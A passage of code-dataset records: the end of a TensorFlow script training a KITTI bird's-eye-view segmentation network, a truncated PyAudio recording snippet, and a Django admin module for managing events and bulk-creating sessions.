np.uint8(depth)\n #depth_png = depth_png.resize(new_size)\n #depth_png = np.array(depth_png, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n #assert(np.max(depth_png) > 255)\n #depth = depth_png.astype(np.float) / 256.\n #depth[depth_png == 0] = -1.\n #depth = normalize(depth)\n #depth = np.uint8(depth)\n return depth\n\n\n\n\n\n\n\n\ndef _read_resize_py_function(filename):\n\n #background_color = np.array([0, 0, 255])\n background_color = np.array([0, 0, 0])\n r_color = np.array([255, 0, 0])#scipy.misc\n g_color = np.array([0, 255, 0])#scipy.misc\n b_color = np.array([0, 0, 255])#scipy.misc\n\n\n image_shape = (576,160)\n new_size =(576,160)\n width_d, height_d = 1242,375\n #width = width_d-576\n width = width_d-new_size[0]\n #height = height_d-160\n height = height_d-new_size[1]\n th_sky = 135 #threshold crop the sky\n left = random.randint(0, width) \n top = random.randint(th_sky, height)\n right, bottom = left+new_size[0], top+new_size[1]\n #image_arr = depth_read(filename, left, right, top, bottom)\n\n #folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n\n #image_decoded = scipy.misc.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = cv2.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n image_decoded = Image.open(filename.decode(),mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n cropped = image_decoded.resize( new_size ) # size: 576 X 160\n image_resized = np.array(cropped)\n #print(image_resized.shape)\n\n\n #print(\"dataset\", folder_img+\"/\"+filename.decode())\n\n #print(\"orig\",np.max(image_resized),np.min(image_resized))\n\n\n#print(image_resized)\n a = [-128,-128,-128]\n image_norm = np.sum((image_resized,a),axis=0)\n #print(\"resta\",np.max(image_norm),np.min(image_norm))\n\n image_norm = np.divide(image_norm,128)\n #cropped.save(\"nn.png\")\n #image_norm.astype(np.float32)\n\n #print (image_norm)\n #print(\"norm\",np.max(image_norm),np.min(image_norm))\n\n\n filename_gt = re.sub(r'(?is)data/', 'gt/', filename.decode())\n\n # filename_gt = re.sub(r'(?is)kitti_raw/raw_data', 'depth_kitti/depth/depth_single_img/train', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_30/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_29/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_28/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_26/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_10_03/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)data/', '', filename_gt)\n #print(\"filename\",filename_gt)\n #folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n\n #label_decoded = scipy.misc.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = cv2.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = Image.open(folder_gt+\"/\"+filename_gt)\n #image_arr = depth_read(filename_gt,image_shape)\n # image_arr = depth_read(filename_gt, left, right, top, bottom)\n\n\n\n\n\n\n\n image_decodedgt = Image.open(filename_gt,mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n croppedgt = image_decodedgt.resize( new_size ) # size: 576 X 160\n\n\n\n label_resized= np.array(croppedgt)\n\n gt_bg = np.all(label_resized == background_color, axis=2)\n gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n\n gt_r = np.all(label_resized == r_color, axis=2)\n gt_r= gt_r.reshape(*gt_r.shape, 1)\n\n gt_g = np.all(label_resized == g_color, axis=2)\n gt_g = gt_g.reshape(*gt_g.shape, 1)\n\n gt_b = np.all(label_resized == b_color, axis=2)\n gt_b = gt_b.reshape(*gt_b.shape, 1)\n\n\n # gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n gt_image = np.concatenate((gt_bg, gt_r, gt_g, gt_b), axis=2)\n\n # print(\"shape image\",image_decoded.shape)\n # print(\"shape gt image\",gt_image.shape)\n\n ###############one hot########################\n # img_array = np.reshape(label_resized,(np.size(label_resized)))\n # one_hot = np.eye(4)[img_array]\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, 1242, 85)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n # 4 clases\n # one_hot =one_hot.reshape(160,576,4)\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n #print(one_hot_b.dtype)\n # one_hot_b = one_hot.astype(bool)\n\n\n\n\n #print(label_resized.shape)\n #print(\"show\")\n #label_decoded.show()\n #print (label_resized)\n #gt_bg = np.all(label_resized == background_color, axis=2)\n #print(gt_bg.shape)\n #print(gt_bg[0][0])\n #gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n #print(gt_bg[0][0])\n #gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n\n\n\n #one_hot_b = one_hot_b.astype(bool)\n # gt_image = one_hot_b\n #print(gt_image[100][100])\n #print(gt_image.shape)\n #print(\"max\",np.max(label_resized))\n #print(\"min\",np.min(label_resized))\n #print(\"gt max\",np.max(gt_image))\n #print(\"gt min\",np.max(gt_image))\n #return folder_img+\"/\"+filename.decode(), folder_gt+\"/\"+filename_gt\n #print(\"shape image\",image_decoded.shape)\n #print(\"shape gt image\",gt_image.shape)\n\n\n\n\n\n\n\n\n\n\n\n#######################################################\n # print(\"gt shape\",gt_image.shape)\n # print(\"image_norm\",image_norm.shape)\n#######################################################\n\n\n #print(\"gt\",gt_image)\n #print(\"ax2\",np.size(gt_image,axis=2))\n #print(\"ax1\",np.size(gt_image,axis=1))\n #print(\"ax0\",np.size(gt_image,axis=0))\n #return cropped, gt_image\n return image_norm, gt_image\n #return image_decoded,image_decoded\n\n\n\n\n# def input_pipeline(filenames, batch_size, num_shards, seed=None):\n# #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# dataset = (tf.data.TextLineDataset(filenames).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count()))#, cycle_length=5) \n# dataset = dataset.shuffle(buffer_size=10000, seed=seed)\n# #dataset = tf.data.TextLineDataset(filenames)\n# #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n# batched_dataset = dataset.batch(batch_size)\n# #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n# #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n# #dataset = dataset.shuffle(buffer_size=10000)\n# #batched_dataset = dataset.batch(batch_size)\n# #iterator = batched_dataset.make_one_shot_iterator()\n# #iterator = batched_dataset.make_initializable_iterator()\n# return batched_dataset.make_initializable_iterator()\n\ndef input_pipeline(filenames, batch_size, num_shards, seed=None):\n\n dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), \n num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.string, tf.string])), num_parallel_calls=2)), cycle_length=2) \n dataset = dataset.shuffle(buffer_size=4000, seed=seed)\n batched_dataset = dataset.batch(batch_size)\n\n return batched_dataset.make_initializable_iterator()\n\n\n\n\n\n\ndef run():\n #num_classes = 3\n #num_classes = 85\n num_classes = 4\n image_shape = (576,160)\n data_dir = '/home/shared/datasets/bird_eye_view/kitti/'\n runs_dir = './runs_bev_kitti'\n #filenames = [\"/home/shared/datasets/kitti_road/data_road/training/training.txt\"]\n #filenames_gt = [\"/home/shared/datasets/kitti_road/data_road/training/gt_training.txt\"]\n filenames = [\"/home/luis2r/Desktop/cnn-for-curb-segmentation/vgg_depth/trainin_bev_kitti_car_people_bici.txt\"]\n #filenames_gt = [\"/home/luis2r/rob_devkit/depth/KITTI/kitti_train_depth_maps.txt\"}\n # data_folder = \"/home/shared/datasets/kitti_road/data_road/training\"\n # filenames = glob(os.path.join(data_folder, 'image_2', '*.png'))\n # filenames = tf.constant(filenames)\n # labels = glob(os.path.join(data_folder, 'gt_image_2', '*_road_*.png'))\n # labels = tf.constant(labels)\n # print(labels)\n\n ########################################################### random.shuffle(filenames)\n\n #tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper2_bev.maybe_download_pretrained_vgg(data_dir)\n\n #epochs = 50\n epochs= 50\n batch_size = 32\n num_shards = 12\n #seed = None\n\n\n\n\n #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n\n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n\n #dataset = dataset.shuffle(buffer_size=10000, seed=20)\n\n\n #dataset = tf.data.TextLineDataset(filenames)\n #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n\n #batched_dataset = dataset.batch(batch_size)\n\n\n\n\n #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n #dataset = dataset.shuffle(buffer_size=10000)\n #batched_dataset = dataset.batch(batch_size)\n #iterator = batched_dataset.make_one_shot_iterator()\n #iterator = batched_dataset.make_initializable_iterator()\n \n seed = tf.placeholder(tf.int64, shape=())\n\n iterator = input_pipeline(filenames, batch_size, num_shards, seed)\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n\n #get_batches_fn = helper2.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n\n\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # TODO: Build NN using load_vgg, layers, and optimize function\n\n\n\n\n # TF placeholders\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes], name='correct_label')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n input_image, keep_prob, vgg_layer3_out, vgg_layer4_out, vgg_layer7_out = load_vgg(sess, vgg_path)\n\n nn_last_layer = layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes)\n\n logits, train_op, cross_entropy_loss = optimize(nn_last_layer, correct_label, learning_rate, num_classes)\n\n # TODO: Train NN using the train_nn function\n\n #train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate)\n train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator, seed)\n\n # TODO: Save inference data using helper2_bev_bev.save_inference_samples\n helper2_bev.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "vgg_depth/main_bev.py", "file_name": "main_bev.py", "file_ext": "py", "file_size_in_byte": 27222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "distutils.version.LooseVersion", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.__version__", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.__version__", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 23, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.saved_model.loader.load", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.saved_model", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 50, "usage_type": "call"}, {"api_name": "project_tests.test_load_vgg", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits_v2", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 124, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 126, "usage_type": "attribute"}, {"api_name": "project_tests.test_optimize", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 321, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 321, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 328, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 365, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 366, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 376, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 376, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 399, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 407, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 431, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 431, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 459, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.list_files", "line_number": 551, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 551, "usage_type": "attribute"}, {"api_name": "tensorflow.data.TextLineDataset", "line_number": 554, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 554, "usage_type": "attribute"}, {"api_name": "tensorflow.py_func", "line_number": 554, "usage_type": "call"}, {"api_name": "tensorflow.double", "line_number": 554, "usage_type": "attribute"}, {"api_name": "tensorflow.bool", "line_number": 554, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 555, "usage_type": "call"}, {"api_name": "helper2_bev.maybe_download_pretrained_vgg", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 627, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 631, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 633, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 633, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 633, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 649, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 649, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 650, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 650, "usage_type": "attribute"}, {"api_name": "helper2_bev.save_inference_samples", "line_number": 664, "usage_type": "call"}]} {"seq_id": "623757362", "text": "import wave\r\nfrom pyaudio import PyAudio,paInt16\r\n\r\n# 录制的音频质量参数\r\nframerate=16000\r\nNUM_SAMPLES=2000\r\nchannels=1\r\nsampwidth=2\r\nTIME=16 #单位为s,实际录音时间会缩小两倍\r\n\r\n# 录音函数\r\ndef save_wave_file(param, my_buf):\r\n pass\r\n\r\n\r\ndef start():\r\n pa=PyAudio()\r\n stream=pa.open(format = paInt16,channels=1,\r\n rate=framerate,input=True,\r\n frames_per_buffer=NUM_SAMPLES)\r\n my_buf=[]\r\n count=0\r\n while count price_till:\n self.cleaned_data.update({\n 'price_from': price_till,\n 'price_till': price_from,\n })\n\n return self.cleaned_data\n\n class Meta:\n widgets = {\n 'title': AutocompleteWidget(model=Event),\n 'main_image': AjaxChosenWidget(),\n }\n\n\nclass BulkSessionForm(forms.ModelForm):\n date_start = forms.DateField(\n label=u'Начальная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n date_end = forms.DateField(\n label=u'Конечная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n days = forms.MultipleChoiceField(\n choices=WEEK_DAYS,\n label=u'Дни недели',\n required=True,\n widget=forms.CheckboxSelectMultiple,\n )\n\n def clean(self):\n def get_working_days(date_start_obj, date_end_obj, days):\n from dateutil import rrule\n if days:\n weekdays = rrule.rrule(\n rrule.DAILY,\n byweekday=days,\n dtstart=date_start_obj,\n until=date_end_obj\n )\n else:\n weekdays = []\n return list(weekdays)\n\n self.cleaned_data = forms.ModelForm.clean(self)\n\n date_start = self.cleaned_data.get('date_start')\n date_end = self.cleaned_data.get('date_end')\n\n if date_start and date_end and date_end < date_start:\n self.cleaned_data.update({\n 'date_start': date_end,\n 'date_end': date_start,\n })\n\n self.days_list = get_working_days(\n self.cleaned_data.get('date_start'),\n self.cleaned_data.get('date_end'),\n map(int, self.cleaned_data.get('days', []))\n )\n\n if not self.days_list:\n raise ValidationError({\n 'days': u'Пожалуйста выберите дни недели, которые '\n u'попадают между выбранными датами.'\n })\n\n return self.cleaned_data\n\n def save(self, commit=True, formset=None, times_start=None, time_end=None):\n instances = []\n times = filter(\n None, set([i.get('time_start') for i in formset.cleaned_data])\n )\n times = times_start or times\n for day in self.days_list:\n for time_start in times:\n inst, create = Session.objects.get_or_create(\n event_place=self.instance,\n date_start=day,\n time_start=time_start,\n defaults={'time_end': time_end}\n )\n if create:\n instances.append(inst)\n return instances\n\n class Meta:\n exclude = tuple()\n model = EventPlace\n\n def get_fieldsets(self):\n return [(None, {'fields': [i.name for i in self.visible_fields()]})]\n\n class Media:\n js = (\n staticfiles_storage.url(\n 'admin/js/admin/sessions.formset.datepicker.js'\n ),\n )\n\n\n# inlines\n\nclass EventInline(ReadonlyInline):\n model = Event\n fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n readonly_fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n\n\nclass SessionInline(admin.TabularInline):\n form = SessionForm\n model = Session\n extra = 1\n exclude = ('id', )\n\n\nclass StartTimeSessionInline(SessionInline):\n exclude = ('id', 'date_start')\n extra = 1\n\n\nclass EventPlaceInline(admin.TabularInline):\n model = EventPlace\n extra = 1\n fields = ('place', 'schedule_btn')\n readonly_fields = ('schedule_btn', )\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget}\n }\n\n\n# admins\n\nclass EventPlaceAdmin(reversion.VersionAdmin):\n inlines = (SessionInline, )\n list_display = (\n 'modified',\n 'event_title',\n 'place_title',\n )\n search_fields = ('event__title', 'place__title')\n readonly_fields = ('event', 'place')\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget},\n }\n\n def change_view(self, request, object_id, form_url='', extra_context=None):\n extra_context = {\n 'has_bulk_session_view': hasattr(self, 'bulk_session_view'),\n }\n return super(EventPlaceAdmin, self).change_view(\n request, object_id, form_url='', extra_context=extra_context\n )\n\n def has_add_permission(self, request):\n return False\n\n @method_decorator(csrf_protect)\n @transaction.atomic\n def bulk_session_view(self, request, object_id, extra_context=None):\n model = self.model\n opts = model._meta\n bulk_session_inlines = [StartTimeSessionInline]\n\n obj = self.get_object(request, unquote(object_id))\n if not self.has_change_permission(request, obj):\n raise PermissionDenied\n if obj is None:\n raise Http404(\n _('{name} object with primary key {key} does not exist.')\n .format(\n name=force_text(opts.verbose_name),\n key=escape(object_id),\n )\n )\n\n ModelForm = BulkSessionForm\n if request.method == 'POST':\n data = request.POST\n data['place'] = obj.place.pk\n data['event'] = obj.event.pk\n form = ModelForm(data, request.FILES, instance=obj)\n form_validated = True if form.is_valid() else False\n new_object = form.instance\n\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, new_object, change=True\n )\n if all_valid(formsets) and form_validated:\n new_objects = form.save(formset=formsets[0])\n redirect_url = reverse('admin:{0}_{1}_change'.format(\n opts.app_label, opts.model_name),\n current_app=self.admin_site.name,\n args=[new_object.pk])\n return self.response_bulk_session(\n request, redirect_url, new_objects\n )\n else:\n form = ModelForm(instance=obj)\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, None, change=False\n )\n\n adminForm = helpers.AdminForm(\n form,\n list(form.get_fieldsets()),\n self.get_prepopulated_fields(request, obj),\n self.get_readonly_fields(request, obj),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_formsets = self.get_inline_formsets(\n request, formsets, inline_instances, obj\n )\n\n for inline_formset in inline_formsets:\n media = media + inline_formset.media\n\n context = dict(\n site_title=self.admin_site.site_title,\n site_header=self.admin_site.site_header,\n title=_(u'Добавить несколько сеансов'),\n adminform=adminForm,\n object_id=object_id,\n original=obj,\n media=media,\n inline_admin_formsets=inline_formsets,\n errors=helpers.AdminErrorList(form, formsets),\n preserved_filters=self.get_preserved_filters(request),\n )\n\n context.update(extra_context or {})\n\n form_url = ''\n new_template = 'admin/{0}/{1}/bulk_session.html'.format(\n opts.app_label, opts.model_name)\n with tools.replace_obj_var(self, 'change_form_template', new_template):\n result = self.render_change_form(\n request, context,\n add=False,\n change=True,\n obj=obj,\n form_url=form_url\n )\n return result\n\n def response_bulk_session(self, request, redirect_url, instances):\n if instances:\n sessions_msg = u'
    {0}
'.format(u''.join(\n [u'
  • Дата: {0} Время начала: {1}
  • '\n .format(i.date_start.date(), i.time_start)\n for i in instances]))\n msg = u'Успешно добавленные сеансы ({0}):
    {1}'\\\n .format(len(instances), sessions_msg)\n else:\n msg = _(u'Сеансы не были добавлены.')\n self.message_user(request, mark_safe(msg), messages.SUCCESS)\n return HttpResponseRedirect(redirect_url)\n\n def get_urls(self):\n from django.conf.urls import url\n urlpatterns = list(super(EventPlaceAdmin, self).get_urls())\n urlpatterns.insert(-1, url(r'^(.+)/bulk_session/$',\n self.bulk_session_view,\n name='admin_bulk_session'))\n return urlpatterns\n\n def event_title(self, obj):\n return obj.event.title\n event_title.allow_tags = True\n event_title.admin_order_field = 'event__title'\n event_title.short_description = _(u'Событие')\n\n def place_title(self, obj):\n return obj.place.title\n place_title.allow_tags = True\n place_title.admin_order_field = 'place__title'\n place_title.short_description = _(u'Место')\n\n\nclass EventAdmin(\n EventPlaceMergeAdminMixin,\n ContentAdminMixin,\n AddUserMixin,\n reversion.VersionAdmin\n):\n form = EventForm\n fieldsets = EventForm.get_fieldsets()\n list_display = (\n 'title',\n 'date_start',\n 'date_end',\n 'main_tag',\n 'tags_display',\n 'source_info_display',\n 'created',\n 'modified',\n 'pub_date',\n 'status',\n 'content_actions',\n )\n inlines = (\n GalleryInline,\n SeoInline,\n PaymentInline,\n EventPlaceInline,\n ContentPropertyInline,\n )\n\n\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventPlace, EventPlaceAdmin)\n", "sub_path": "src/admin_app/events/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 14448, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.forms.ModelForm", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 57, "usage_type": "name"}, {"api_name": "datetimewidget.widgets.DateWidget", "line_number": 61, "usage_type": "call"}, {"api_name": "datetimewidget.widgets.TimeWidget", "line_number": 66, "usage_type": "call"}, {"api_name": "datetimewidget.widgets.TimeWidget", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage.url", "line_number": 72, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage", "line_number": 72, "usage_type": "name"}, {"api_name": "admin_app.core.forms.ContentModelForm", "line_number": 78, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 93, "usage_type": "name"}, {"api_name": 